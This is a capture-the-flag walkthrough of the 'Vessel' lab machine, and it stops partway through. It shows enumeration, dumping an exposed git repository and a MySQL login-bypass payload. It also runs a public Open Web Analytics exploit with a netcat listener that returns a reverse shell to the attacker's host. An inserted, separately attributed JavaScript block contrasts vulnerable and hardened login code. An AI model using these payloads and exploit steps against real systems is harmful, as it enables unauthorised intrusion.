Vessel

Let's start off with nmap:

nmap -sC -sV -T4 10.129.227.225
Host is up (0.058s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 38c297327b9ec565b44b4ea330a59aa5 (RSA)
|   256 33b355f4a17ff84e48dac5296313833d (ECDSA)
|_  256 a1f1881c3a397274e6301f28b680254e (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: Vessel
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only ports 22 and 80 are open. Let's skip SSH and head to HTTP!

[image: website-initial]

Wappalyzer tells us that the site/backend is built with Express/Node.js, and the footer reveals the domain vessel.htb. First, let's add that to our /etc/hosts:

sudo nano /etc/hosts

File should look like this:

127.0.0.1       localhost
127.0.1.1       joonas-VirtualBox
# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.227.225  vessel.htb

There also seems to be a login page:

[image: login-page]

There's also a register page but it does not seem to be functioning.

Next, let's run gobuster to find endpoints/pages:

gobuster dir -u http://vessel.htb -w /opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -t 30 --exclude-length 26

After not too long we get some results:

===============================================================
2023/01/16 19:52:40 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 171] [--> /js/]
/logout               (Status: 302) [Size: 28] [--> /login]
/img                  (Status: 301) [Size: 173] [--> /img/]
/404                  (Status: 200) [Size: 2393]
/dev                  (Status: 301) [Size: 173] [--> /dev/]
/.                    (Status: 200) [Size: 15030]
/admin                (Status: 302) [Size: 28] [--> /login]
/register             (Status: 200) [Size: 5830]
/500                  (Status: 200) [Size: 2335]
/css                  (Status: 301) [Size: 173] [--> /css/]
/401                  (Status: 200) [Size: 2400]
/login                (Status: 200) [Size: 4213]
/reset                (Status: 200) [Size: 3637]

/dev seems interesting, let's check that out! It seems that /dev/ sends us to a 404 page:

[image: dev-404]

But earlier we got a 301 redirect from /dev, which is strange. Brute forcing directories under it does not show any results either. Since the path name is dev, maybe there's a git repository? Let's try git-dumper. Note: sourcecode is the name of the folder where the tool stores the results.

git-dumper http://vessel.htb/dev/ sourcecode

[image: git-dumper]

That did it! Let's take a look at the login function:

[image: login-source]

At first it seems like there's nothing exploitable, but according to this article this is not secure and we can bypass it with the payload:

username=admin&password[password]=1

Basically, Express parses password[password]=1 into an object, and the mysql driver expands that object into `password` = 1, so the query ends up looking like this:

SELECT * FROM accounts WHERE username = 'admin' AND password = `password` = 1

MySQL evaluates the chained comparison left to right as (password = password) = 1, which is always true if the database has a user named admin.
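As an added illustration (not code from the write-up or from the Vessel application), here is an Express-style login query built the vulnerable way next to a hardened version that refuses non-string credentials before they reach the driver. parseForm and escapeValue are simplified stand-ins for qs-style body parsing and the mysql package's escaping, so the example runs offline.

```javascript
// Added example, not the write-up's or the Vessel app's code. parseForm and
// escapeValue are simplified stand-ins (assumptions) for qs-style nested body
// parsing and for the mysql package's escaping, so the example runs offline.
function parseForm(body) {            // "a[b]=c" -> { a: { b: "c" } }
  const out = {};
  for (const pair of body.split("&")) {
    const [rawKey, rawVal = ""] = pair.split("=");
    const key = decodeURIComponent(rawKey), val = decodeURIComponent(rawVal);
    const m = key.match(/^([^[\]]+)\[([^[\]]+)\]$/);
    if (m) (out[m[1]] = out[m[1]] || {})[m[2]] = val;
    else out[key] = val;
  }
  return out;
}

// Strings are quoted, numbers pass through, and (the trap) a plain object is
// expanded into `key` = value pairs, exactly what lets password[password]=1 work.
function escapeValue(v) {
  if (typeof v === "number") return String(v);
  if (typeof v === "string") return "'" + v.replace(/['\\]/g, (c) => "\\" + c) + "'";
  if (v && typeof v === "object") {
    return Object.entries(v).map(([k, x]) => "`" + k + "` = " + escapeValue(x)).join(", ");
  }
  throw new TypeError("unsupported value");
}

// Substitute ? placeholders the way query(sql, params) does.
function buildQuery(sql, params) {
  let i = 0;
  return sql.replace(/\?/g, () => escapeValue(params[i++]));
}

// Vulnerable: the parsed body goes straight into the query. With the payload
// above this yields "... password = `password` = '1'", which MySQL evaluates
// left to right as (password = password) = '1', i.e. 1 = '1', i.e. true.
function vulnerableLoginQuery(body) {
  const { username, password } = parseForm(body);
  return buildQuery("SELECT * FROM accounts WHERE username = ? AND password = ?", [username, password]);
}

// Hardened: insist on plain strings before the value reaches the driver and
// reject anything else (object, array, missing), e.g. with 400 Bad Request.
function hardenedLoginQuery(body) {
  const { username, password } = parseForm(body);
  if (typeof username !== "string" || typeof password !== "string") return null;
  return buildQuery("SELECT * FROM accounts WHERE username = ? AND password = ?", [username, password]);
}
```

The same type check belongs in any handler that forwards user-controlled values to the driver, since the object expansion applies to every placeholder, not just passwords.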

Let's log in and let Burp Suite intercept our request:

[image: burp-login]

We get in:

[image: admin-page]

The analytics link leads us to another subdomain, openwebanalytics.vessel.htb. Let's add it to our /etc/hosts file:

127.0.0.1       localhost
127.0.1.1       joonas-VirtualBox
# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.227.225  vessel.htb openwebanalytics.vessel.htb

[image: open-web-analytics]

The analytics site seems to be built with Open Web Analytics, which is open source software. Looking at the page source we even get the version in use:

[image: analytics-source]

A quick Google search reveals that version 1.7.3 is vulnerable to CVE-2022-24637 and that a public PoC is available on GitHub! Let's download the exploit. Before running it, start a netcat listener on port 9001:

nc -lnvp 9001

Now, run the exploit:

python3 exploit.py http://openwebanalytics.vessel.htb/ 10.10.14.90 9001

And we get a shell as www-data!

joonas@joonas-VirtualBox:~$ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.129.227.225 46914
ls
1
1ZDJPckC.php
cache.lock
whoami
www-data

We have access to user steven's home folder, and there's some kind of passwordGenerator app. Also, there's a .notes folder with two files, notes.pdf and screenshot.png:

cd /home/steven
ls
passwordGenerator
ls -la
total 33796
drwxrwxr-x 3 steven steven     4096 Aug 11 14:43 .
drwxr-xr-x 4 root   root       4096 Aug 11 14:43 ..
lrwxrwxrwx 1 root   root          9 Apr 18  2022 .bash_history -> /dev/null
-rw------- 1 steven steven      220 Apr 17  2022 .bash_logout
-rw------- 1 steven steven     3771 Apr 17  2022 .bashrc
drwxr-xr-x 2 ethan  steven     4096 Aug 11 14:43 .notes
-rw------- 1 steven steven      807 Apr 17  2022 .profile
-rw-r--r-- 1 ethan  steven 34578147 May  4  2022 passwordGenerator
cd .notes
ls
notes.pdf
screenshot.png

After downloading the files to our machine (you can use netcat for that), let's check what they are all about.

The passwordGenerator seems to be a Microsoft Windows executable:

joonas@joonas-VirtualBox:~/Documents/htb/vessel/$ file passwordGenerator
passwordGenerator: PE32 executable (console) Intel 80386, for MS Windows
joonas@joonas-VirtualBox:~/Documents/htb/vessel/$ 

The screenshot seems to be a picture of the app:

[image: password-generator]

And the notes.pdf is a password-protected pdf file. Time to reverse the generator.

Running strings on the app prints many references to python and python 3.7, so chances are it is a Python-based app. Binwalk also gives the impression that the file is packed. Python-based executables are usually made with PyInstaller, and we can try to reverse it. There's a tool, pyinstxtractor, which can unpack the archive for us. It is good practice to use the same Python version on our machine as the app was built with, in this case 3.7; pyenv can handle that. After setting up Python we can run pyinstxtractor:

joonas@joonas-VirtualBox:~/Documents/htb/vessel/pyinstxtractor$ python pyinstxtractor.py ../passwordGenerator
[+] Processing ../passwordGenerator
[+] Pyinstaller version: 2.1+
[+] Python version: 3.7
[+] Length of package: 34300131 bytes
[+] Found 95 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_pyside2.pyc
[+] Possible entry point: passwordGenerator.pyc
[+] Found 142 files in PYZ archive
[+] Successfully extracted pyinstaller archive: ../passwordGenerator

You can now use a python decompiler on the pyc files within the extracted directory

TO BE CONTINUED